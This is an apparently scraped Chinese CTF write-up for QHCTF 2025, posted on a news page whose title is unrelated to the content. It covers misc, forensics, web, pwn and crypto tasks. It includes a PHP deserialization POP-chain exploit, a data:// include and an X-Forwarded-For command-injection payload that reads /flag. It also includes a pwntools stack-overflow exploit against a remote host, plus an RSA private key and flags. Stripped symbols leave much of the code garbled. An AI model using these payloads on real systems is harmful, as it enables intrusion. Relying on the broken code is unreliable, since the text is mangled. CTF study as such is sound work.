当前位置：首页 > news >正文

国外网站注册企业网站建立的失败案例

news 2025/9/17 21:27:56

国外网站注册,企业网站建立的失败案例,北京建设网站公司哪家好,母婴网站建设初衷misc PvzHE 去这个文件夹有一张图片 QHCTF{300cef31-68d9-4b72-b49d-a7802da481a5} QHCTF For Year 2025 攻防世界有一样的 080714212829302316092230 对应Q 以此类推 QHCTF{FUN} 请找出拍摄地所在位置柳城顺丰 forensics win01 这个软件云沙盒分析一下 md5 ad4…misc PvzHE 去这个文件夹有一张图片 QHCTF{300cef31-68d9-4b72-b49d-a7802da481a5} QHCTF For Year 2025 攻防世界有一样的 080714212829302316092230 对应Q 以此类推 QHCTF{FUN} 请找出拍摄地所在位置柳城顺丰 forensics win01 这个软件云沙盒分析一下 md5 ad4fdee2eada36ec3c20e9d6311cf258 Win_02 HackY$ 32ED87BDB5FDC5E9CBA88547376818D4 123456 HackY$_123456 fb484ad326c0f3a4970d1352bfbafef8 Win_07 找到密码 Th3_1s_F1ag.Z1p_PssW0rd_Y0u_Now 解压 QHCTF{6143b46a-8e98-4356-a9b2-251a7ec19e51} web Web_pop ?php error_reporting(0); highlight_file(__FILE__); class Start{public $name;protected $func;public function __destruct(){echo Welcome to QHCTF 2025, .$this-name;}public function __isset($var){($this-func)();} }class Sec{private $obj;private $var;public function __toString(){$this-obj-check($this-var);return CTFers;}public function __invoke(){echo file_get_contents(/flag);} }class Easy{public $cla;public function __call($fun, $var){$this-cla clone $var[0];} }class eeee{public $obj;public function __clone(){if(isset($this-obj-cmd)){echo success;}} }if(isset($_POST[pop])){unserialize($_POST[pop]); } 后门在这里file_get_contents(/flag); 然后逆着看 __invoke ($this-func)();-__invoke if(isset($this-obj-cmd))-($this-func)();-__invoke $this-cla clone $var[0];- if(isset($this-obj-cmd))-($this-func)();-__invoke $this-obj-check($this-var);-$this-cla clone $var[0];- if(isset($this-obj-cmd))-($this-func)();-__invoke echo Welcome to QHCTF 2025, .$this-name;- $this-obj-check($this-var);-$this-cla clone $var[0];- if(isset($this-obj-cmd))-($this-func)();-__invoke 这样来触发。也就是 $anew Start(); $a-namenew Sec(); $a-name-objnew Easy(); $a-name-obj-clanew eeee(); $a-name-obj-cla-objnew Start(); $a-name-obj-cla-obj-funcnew Sec(); exp ?php error_reporting(0); highlight_file(__FILE__); class Start {public $name;public $func; } class Sec {public $obj;public $var; } class Easy {public $cla; } class eeee {public $obj; } $a new Start; $b new Sec; $c new Easy; $d new eeee; $e new Sec; $f new Start; $a-name $b; $b-obj $c; $b-var $d; $d-obj $f; $f-func $e; echo serialize($a); Easy_include ?filedata://text/plain, 即可命令执行 Web_IP IP的地方可以执行命令 X-Forwarded-For {system(cat /flag)} PCREMagic 可以上传文件对文件名没有限制最后都会重命名1-9.php 关键是文件内容检测?php pwn Easy_Pwn vulnerable 栈溢出 exp from pwn import* from struct import pack from ctypes import * #from LibcSearcher import * context(oslinux,archamd64,log_leveldebug) premote(154.64.245.108,33135) #pprocess(./pwn) libcELF(/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6) elfELF(./pwn) def bug():gdb.attach(p)pause() def s(a):p.send(a) def sa(a,b):p.sendafter(a,b) def sl(a):p.sendline(a) def sla(a,b):p.sendlineafter(a,b) def r(a):p.recv(a) def pr(a):print(p.recv(a)) def rl(a):return p.recvuntil(a) def inter():p.interactive() def get_addr64():return u64(p.recvuntil(\x7f)[-6:].ljust(8,b\x00)) def get_addr32():return u32(p.recvuntil(\xf7)[-4:]) def get_sb():return libc_baselibc.sym[system],libc_baselibc.search(b/bin/sh\x00).__next__() li lambda x : print(\x1b[01;38;5;214m x \x1b[0m) ll lambda x : print(\x1b[01;38;5;1m x \x1b[0m) payba*0x58p64(0x4011ca) #bug() s(pay) inter() cr Easy_RSA from Crypto.PublicKey import RSA from Crypto.Cipher import PKCS1_OAEP import base64 # 生成RSA密钥对 private_key b-----BEGIN RSA PRIVATE KEY-----\nMIICXAIBAAKBgQCYQjRaBQcBJmdxdCo4YaK/8TIdlj9Cjt6ewjF8NzV7BAj5ZEXy\nsuXdYbXVOAmVKDYKglo9TKUbRVKbPk7f3rIfnIrMqm8TpJTPAnyssiXs3Zy9yzp\nqWbRTvd0xWJoWxy9TTzdczkS8yVkRBIdNJ3ghJV8B5YVkgFtMoyPX8TQhQIDAQAB\nAoGARibOvyEs2oNKyvO2VjbqCRzEtewZZn20JZqcuTooum6gAeQI9GsnzKnt4PkK\nNT6LM6lekXrEYb29c0iwh6YwE/mOIu5G3Yz2qQJDyZEqvM4N4KnITJM4v1WPv7tC\nurpZj906Odbx6oFXNc5XJMGp6GgjOqqLomBCcRvKlKdX36sCQQDA3GGS4Hy5htlQ\nydkiQujUAAlcoTlx/kPZSrCOehBsOWytwRjiGm1xTu6s8mBY2OkIDZx1DGbDQ54\nKi9jJqWfAkEAyhr1iR9mofiWqSfcG41jjmLFUgKFcO/ImcE3kcs2eGLodoyOJF1\nCBPw8ANME36OJiwXNSFOyQJWuzNoJchvWwJAG36Pjn/gaBaYXpMYGHFPfgGvU/xM\nEzs7cvvZ5cXzF2qsWqz/niREW/XzwsYfBCuRJmXNPTcSB1e6K1lgPhNhYwJBALZg\nxZnL4E3hrcUWMVq/2UxS2ROHQrKJRf3BgT8kc3Dae6qv/sUJ8v2UsID967P0W7Y\n8shbGkGB/spHhYAy82kCQE7UVrGsArk46F1snawUIPUPMye3yBwvCeyCSXWyQ7h\nS1IaHaAy3kJ9J/0faMDayG724TpMcsBii1pU2Hhh8p0\n-----END RSA PRIVATE KEY----- public_key b-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCYQjRaBQcBJmdxdCo4YaK/8TId\nlj9Cjt6ewjF8NzV7BAj5ZEXysuXdYbXVOAmVKDYKglo9TKUbRVKbPk7f3rIfnIrM\nqm8TpJTPAnyssiXs3Zy9yzpqWbRTvd0xWJoWxy9TTzdczkS8yVkRBIdNJ3ghJV8\nB5YVkgFtMoyPX8TQhQIDAQAB\n-----END PUBLIC KEY----- enmessagePSvEAGef52/sz8q2f3jjC2OJP9pYEa04kSTeTIX3swnAMrJw9ZagvLRplqkNjdCmvRAbnbYrBXi9aP8sz604rqn7S58WTyPgnqIkFwynHBY7NTmvVAKKDc7GJWltQql4iVAxFbrwIBREcSZJwhloWGmCa5dBjlMEzWtv6Jx0o def encrypt_message(message, public_key):key RSA.import_key(public_key)cipher PKCS1_OAEP.new(key)encrypted_message cipher.encrypt(message.encode())return base64.b64encode(encrypted_message).decode() def decrypt_message(encrypted_message, private_key):key RSA.import_key(private_key)cipher PKCS1_OAEP.new(key)decrypted_message cipher.decrypt(base64.b64decode(encrypted_message))return decrypted_message.decode() #message Hello, this is a secret message! # encrypted encrypt_message(message, public_key) # print(加密后的消息:) # print(encrypted) decrypted decrypt_message(enmessage, private_key) print(解密后的消息:) print(decrypted) 传入题目给的公钥私钥以及密文访问靶机/encode即可 QHCTF{ec9ee719-8336-4a7c-8c7f-745c89d220ce}

查看全文

http://www.tj-hxxt.cn/news/141779.html